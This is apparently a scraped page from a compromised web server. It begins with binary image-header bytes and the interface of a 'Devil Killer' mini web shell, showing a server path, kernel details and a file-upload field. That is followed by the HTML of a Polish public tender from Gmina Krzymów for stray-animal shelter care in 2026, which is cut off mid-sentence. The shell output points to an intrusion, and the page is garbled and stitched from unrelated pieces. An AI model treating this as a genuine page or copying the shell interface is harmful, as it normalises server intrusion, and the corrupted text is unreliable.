JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251119/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251119/0054289601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opieka nad bezdomnymi zwierzętami z terenu gminy Krzymów w 2026 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KRZYMÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019183</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościelna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzymów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-513</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@krzymow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.krzymow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opieka nad bezdomnymi zwierzętami z terenu gminy Krzymów w 2026 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e78eafa-1e7a-400e-9181-81162b99bebd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00542896</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00022609/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 OPIEKA NAD BEZDOMNYMI ZWIERZĘTAMI Z TERENU GMINY KRZYMÓW”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_krzymow/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Zamawiającym a wykonawcami odbywa się przy użyciu<br/>środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej Zamawiającego dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/ug_krzymow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający informuje, że szczegółowe informacje dotyczące korzystania z Platformy zakupowej oraz sposobu komunikowania się za pośrednictwem<br/>Platformy zakupowej dotyczące w szczególności logowania, składania ofert, składania wniosków o wyjaśnienie treści SWZ, oraz pozostałych czynności podejmowanych w niniejszym postępowaniu są zawarte w zakładce „Instrukcje dla Wykonawców&#34; (dostępnej<br/>na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje oraz „Regulaminie platformazakupowa.pl dla<br/>Użytkowników (Wykonawców)” (dostępnym na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/1-regulamin<br/>2. Zaleca się, aby przed rozpoczęciem wypełniania Formularza składania oferty wykonawca zalogował się do systemu, a jeżeli nie<br/>posiada konta, założył bezpłatne konto.<br/>W przeciwnym wypadku wykonawca będzie miał ograniczone funkcjonalności, np. brak widoku wiadomości prywatnych od<br/>Zamawiającego w systemie lub wycofania oferty bez kontaktu z Centrum Wsparcia Klienta.<br/>3. Rejestracja i korzystanie z Platformy zakupowej jest bezpłatne. Dokonując rejestracji wykonawca akceptuje regulamin korzystania<br/>z Platformy zakupowej.<br/>4. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy zakupowej.<br/>Informacje takie jak odpowiedzi na pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/>na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem będzie dany<br/>wykonawca, przekazywana będzie do konkretnego wykonawcy.<br/>5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>6. Wszelka korespondencja związaną z niniejszym postępowaniem winna być przekazywana za pośrednictwem Platformy<br/>zakupowej. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego<br/>terminu. Każda ze stron na żądanie drugiej strony niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>7. Za datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń oraz innych informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy zakupowej poprzez kliknięcie<br/>przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do<br/>Zamawiającego.<br/>8. W sytuacjach awaryjnych, np. w przypadku awarii Platformy, Zamawiający dopuszcza również możliwość komunikowania się z<br/>wykonawcami za pośrednictwem poczty elektronicznej: urzad@krzymow.pl - z tym zastrzeżeniem, iż oferta, w tym oświadczenia, o<br/>których mowa<br/>w Rozdziale IX ust. 1 mogą zostać przekazane wyłącznie za pomocą Platformy zakupowej.<br/>9. W Rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), zostały określone niezbędne wymagania techniczne związane z<br/>korzystaniem z Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): 1. Administratorem Pani/Pana danych osobowych jest Gmina Krzymów: reprezentowana przez Wójta, z siedzibą pod adresem Krzymów ul. Kościelna 2, 62-513 Krzymów.<br/>2. Funkcję Inspektora Ochrony Danych pełni Marcin Michlicki, z którym można skontaktować się osobiście, pod adresem Krzymów, ul. Główna 17/1, tel. 63 24 13 290 lub poprzez e-mail urzad@krzymow.pl w każdej sprawie dotyczącej przetwarzania Pani/Pana danych osobowych.<br/>3. Administrator danych osobowych przetwarza Pani/Pana dane osobowe na podstawie obowiązujących przepisów prawa,zawartych umów oraz na podstawie udzielonej zgody.<br/>1) Pani/Pana dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - akty prawne na podstawie, których działają Referaty Urzędu Gminy w Krzymowie oraz na podstawie Art. 6 ust. 1 lit. c i Art. 9 ust.1 lit. g ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. w skrócie RODO.<br/>2) realizacji umów zawartych z kontrahentami Gminy Krzymów;<br/>3) w pozostałych przypadkach Pani/Pana dane osobowe przetwarzane są wyłącznie na podstawie wcześniej udzielonej zgody w zakresie i celu określonym w treści zgody.<br/>4. W związku z przetwarzaniem danych w celach o których mowa w pkt 3 odbiorcami Pani/Pana danych osobowych mogą być:<br/>1) organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa;<br/>2) inne podmioty, które na podstawie stosownych umów podpisanych z Urzędem Gminy w Krzymowie przetwarzają dane osobowe których Administratorem jesteśmy.<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów określonych w pkt 3, a po tym czasie przez okres wymagany instrukcją kancelaryjną (archiwalną).<br/>6. W związku z przetwarzaniem Pani/Pana danych osobowych przysługują Pani/Panu następujące uprawnienia z wyjątkiem, jeżeli<br/>dane osobowe są przetwarzane na podstawie przepisów prawa:<br/>1) prawo dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych;<br/>2) prawo do żądania sprostowania (poprawiania) danych osobowych – w przypadku gdy dane są nieprawidłowe lub niekompletne;<br/>3) prawo do żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku gdy:<br/>- dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane,<br/>- osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych osobowych,<br/>- osoba, której dane dotyczą wycofała zgodę na przetwarzanie danych osobowych, która jest podstawą przetwarzania danych i nie<br/>ma innej podstawy prawnej przetwarzania danych,<br/>- dane osobowe przetwarzane są niezgodnie z prawem,<br/>- dane osobowe muszą być usunięte w celu wywiązania się z obowiązku wynikającego z przepisów prawa;<br/>4) prawo do żądania ograniczenia przetwarzania danych osobowych – w przypadku, gdy:<br/>- osoba, której dane dotyczą kwestionuje prawidłowość danych osobowych,<br/>- przetwarzanie danych jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w zamian<br/>ich ograniczenia,<br/>- Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane dotyczą, potrzebuje ich do ustalenia, obrony lub<br/>dochodzenia roszczeń,<br/>- osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych, do czasu ustalenia czy prawnie uzasadnione<br/>podstawy po stronie administratora są nadrzędne wobec podstawy sprzeciwu;<br/>5) prawo do przenoszenia danych – w przypadku gdy łącznie spełnione są następujące przesłanki:<br/>- przetwarzanie danych odbywa się na podstawie umowy zawartej z osobą, której dane dotyczą lub na podstawie zgody wyrażonej przez tą osobę,<br/>- przetwarzanie odbywa się w sposób zautomatyzowany;<br/>Ze względu na ograniczoną liczbę znaków pozostałe zapisy znajdują się w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.60.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: odławianie, transport i czasowe przetrzymywanie bezdomnych zwierząt w schronisku oraz<br/>zapobieganie bezdomności zwierząt z terenu Gminy Krzymów w ramach Programu opieki nad bezdomnymi zwierzętami.<br/>Zamówienie obejmuje w szczególności:<br/>1) odławianie i transport bezdomnych zwierząt z terenu Gminy Krzymów do schroniska dla bezdomnych zwierząt,<br/>2) przyjmowanie i sprawowanie opieki nad bezdomnymi zwierzętami z terenu Gminy Krzymów w schronisku dla<br/>bezdomnych zwierząt, 7 dni w tygodniu 24/h na dobę, (również w dni świąteczne), zapewnienie im niezbędnej opieki<br/>weterynaryjnej, podstawowych warunków socjalno- bytowych. Przez bezdomne zwierzęta rozumie się zwierzęta domowe,<br/>które uciekły, zabłąkały się lub zostały porzucone przez człowieka, a nie ma możliwość ustalenia ich właściciela, pod opieką<br/>którego zwierzę dotychczas pozostawało. Nie dotyczy zwierząt gospodarskich.<br/>3) przyjęcie pod opiekę 50 szt. (+/- 5 szt.) bezdomnych zwierząt będących pod opieką Gminy Krzymów, odłowionych przed<br/>dniem obowiązywania umowy z Wykonawcą - przewiezienie bezdomnych zwierząt z obecnego miejsca pobytu oraz<br/>zapewnienie im właściwych warunków bytowych zgodnie z obowiązującymi normami i przepisami prawa. Wykonawca<br/>zapewnia transport w ramach kosztów wykonania umowy,<br/>4) zapewnienie opieki lekarsko – weterynaryjnej poprzez:<br/>- kontrolę stanu zdrowia zwierzęcia,<br/>- profilaktykę i leczenie,<br/>- zwalczanie pasożytów wewnętrznych i zewnętrznych,<br/>- okresowe szczepienie,<br/>5) zakładanie i prowadzenie karty informacyjnej z opisem wykonywanych czynności zwierzęcia w schronisku, zawierającą<br/>następujące dane:<br/>- data przyjęcia,<br/>- rodzaj i płeć,<br/>- opis stanu zdrowia,<br/>- opis przeprowadzonych zabiegów, w tym informacji o: sterylizacji, odrobaczeniu i wykonaniu podstawowych szczepień,<br/>potwierdzonych przez lekarza weterynarii wpisem do karty zwierzęcia, śmierci zwierzęcia, w tym śmierci poprzez<br/>stwierdzenie przez lekarza weterynarii konieczności uśpienia zwierzęcia, które wymaga zaświadczenia lekarza weterynarii,<br/>6) zapewnienie transportu dla zwierząt agresywnych,<br/>7) czipowanie,<br/>8) przeprowadzenie sterylizacji lub kastracji bezdomnemu zwierzęciu z terenu Gminy Krzymów,<br/>9) usypianie ślepych miotów,<br/>10) utylizację padłych zwierząt,<br/>11) zapewnienie zwierzętom według obowiązujących norm wystarczających ilości karmy i stałego dostępu do wody,<br/>pomieszczenia umożliwiającego swobodną zmianę pozycji ciała, chroniącego przed zimnem, upałami i opadami<br/>atmosferycznymi z dostępem do światła dziennego oraz wybiegu,<br/>12) prowadzenie w imieniu Zamawiającego aktywnej akcji adopcyjnej dotyczącej bezdomnych zwierząt odłowionych z<br/>terenu Gminy Krzymów poprzez zamieszczanie zdjęć zwierząt m.in. na stronach internetowych, w mediach<br/>społecznościowych, poszukiwanie dla nich nowych właścicieli zdolnych zapewnić właściwą opiekę i należyte warunki<br/>utrzymania,<br/>Szacowane ilości zabiegów:<br/>1. Odrobaczenie psy/koty - 165<br/>2. Odpchlenie psy/koty - 35<br/>3. Koszt leczenia i operacji chirurgicznych - 10<br/>4. Kastracja psa - 25<br/>5. Sterylizacja suki psa - 25<br/>6. Kastracja kocura - 10<br/>7. Sterylizacji kotki - 10<br/>8. Chipowanie - 30<br/>9. Szczepienia wymagane - 65<br/>10. Przechowywanie i utylizacja zwłok - 6<br/>11. Eutanazja zwierzęcia pies/kot - 5<br/>12. Odłowienie zwierzęcia - 30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98380000-0 - Usługi psiarni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77500000-5 - Usługi hodowli zwierząt</p> <p class="mb-0">85200000-1 - Usługi weterynaryjne</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu (na zasadach określonych w SWZ) oraz spełniają niżej określone warunki udziału w postępowaniu:<br/>a. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni niniejszy warunek, jeżeli wykaże, że posiada:<br/>− aktualne zezwolenie na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami zgodnie z art. 7 ust.<br/>1 pkt. 3 Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2025 r. poz. 733),<br/>− aktualne zezwolenie na prowadzenie schronisk dla bezdomnych zwierząt wydane przez właściwe organu zgodnie z art. 7 ust. 1 pkt. 4 Ustawy z dnia 13 września 1996 r.<br/>o utrzymaniu czystości i porządku w gminach (Dz. U. z 2025 r. poz. 733),<br/>− decyzję Powiatowego Lekarza Weterynarii, właściwego ze względu na miejsce prowadzenia działalności potwierdzające<br/>spełnienie wymagań weterynaryjnych<br/>w zakresie gromadzenia zwierząt określonych dla prowadzenia danego rodzaju działalności zgodnie z art. 5 ust. 1 Ustawy z<br/>dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. 2023 r. poz. 1075 ze zm.).<br/>c. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>d. zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Napotwierdzenie spełnienia warunków udziału w postępowaniu:<br/>a. aktualne zezwolenie na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami zgodnie z art. 7 ust. 1 pkt. 3<br/>Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2025 r. poz. 733 ze zm.),<br/>b. aktualne zezwolenie na prowadzenie schronisk dla bezdomnych zwierząt wydane przez właściwy organ zgodnie z art. 7 ust. 1 pkt.<br/>4 ustawy z dnia 13 września 1996 r.<br/>o utrzymaniu czystości i porządku w gminach (Dz. U. z 2025 r. poz. 733 ze zm.),<br/>c. decyzję Powiatowego Lekarza Weterynarii, właściwego ze względu na miejsce prowadzenia działalności potwierdzające<br/>spełnienie wymagań weterynaryjnych w zakresie gromadzenia zwierząt określonych dla prowadzenia danego rodzaju działalności<br/>zgodnie z art. 5 ust. 1 ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz.U. 2023 r. poz. 1075 ze zm.).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenia wykonawcy o którym mowa w art. 125 ust. 1 Ustawy</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 2 000,00 zł.<br/>2. Wadium musi zostać wniesione przed upływem terminu składania ofert i obejmować pełen okres związania ofertą, z<br/>wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 